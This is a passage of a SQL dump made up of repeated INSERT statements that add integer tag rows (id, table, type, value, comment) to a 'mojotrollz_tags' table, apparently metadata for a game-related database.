VALUES (4422, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4423, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4423, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4424, 1, 1, 47, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4424, 1, 2, 491, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4424, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4425, 1, 1, 47, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4425, 1, 2, 491, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4425, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4427, 1, 1, 47, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4427, 1, 2, 491, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4427, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4428, 1, 1, 47, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4428, 1, 2, 491, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4428, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4429, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4429, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4430, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4430, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4435, 1, 1, 47, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4435, 1, 2, 491, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4435, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4436, 1, 1, 47, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4436, 1, 2, 491, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4436, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4437, 1, 1, 47, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4437, 1, 2, 491, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4437, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4438, 1, 1, 47, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4438, 1, 2, 491, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4438, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4440, 1, 1, 47, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4440, 1, 2, 491, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4440, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4442, 1, 1, 47, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4442, 1, 2, 491, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4442, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4444, 1, 1, 33, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4444, 1, 2, 209, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4444, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4451, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4451, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4452, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4452, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4453, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4453, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4454, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4454, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4455, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4455, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4456, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4456, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4457, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4457, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4458, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4458, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4459, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4459, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4460, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4460, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4461, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4461, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4462, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4462, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4463, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4463, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4464, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4464, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4465, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4465, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4466, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4466, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4467, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4467, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4468, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4468, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4469, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4469, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4472, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4472, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4474, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4474, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4475, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4475, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4479, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4479, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4480, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4480, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4481, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4481, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4483, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4483, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4484, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4484, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4485, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4485, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4485, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4485, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4485, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4485, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4486, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4486, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4486, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4486, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4486, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4488, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4488, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4488, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4488, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4488, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4489, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4489, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4490, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4493, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4493, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4494, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4494, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4495, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4495, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4496, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4496, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4498, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4498, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4499, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4499, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4500, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4500, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4501, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4501, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4502, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4502, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4503, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4503, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4504, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4505, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4505, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4506, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4506, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4507, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4507, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4508, 1, 1, 47, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4508, 1, 2, 491, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4508, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4509, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4510, 1, 1, 47, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4510, 1, 2, 491, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4510, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4511, 1, 1, 47, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4511, 1, 2, 491, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4511, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4512, 1, 1, 47, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4512, 1, 2, 491, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4512, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4514, 1, 1, 47, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4514, 1, 2, 491, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4514, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4515, 1, 1, 47, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4515, 1, 2, 491, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4515, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4516, 1, 1, 47, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4516, 1, 2, 491, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4516, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4517, 1, 1, 47, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4517, 1, 2, 491, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4517, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4518, 1, 1, 47, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4518, 1, 2, 491, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4518, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4519, 1, 1, 47, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4519, 1, 2, 491, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4519, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4520, 1, 1, 47, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4520, 1, 2, 491, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4520, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4521, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4521, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4522, 1, 1, 47, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4522, 1, 2, 491, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4522, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4523, 1, 1, 47, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4523, 1, 2, 491, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4523, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4525, 1, 1, 47, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4525, 1, 2, 491, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4525, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4526, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4528, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4530, 1, 1, 47, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4530, 1, 2, 491, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4530, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4531, 1, 1, 47, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4531, 1, 2, 491, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4531, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4532, 1, 1, 47, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4532, 1, 2, 491, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4532, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4534, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4535, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4538, 1, 1, 47, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4538, 1, 2, 491, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4538, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4539, 1, 1, 47, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4539, 1, 2, 491, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4539, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4540, 1, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4540, 1, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4540, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4541, 1, 1, 47, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4541, 1, 2, 491, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4541, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4542, 1, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4542, 1, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4542, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4543, 1, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4543, 1, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4543, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4544, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4544, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4545, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4545, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4546, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4546, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4547, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4547, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4548, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4548, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4549, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4549, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4549, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4549, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4549, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4550, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4550, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4550, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4550, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4550, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4551, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4551, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4551, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4551, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` 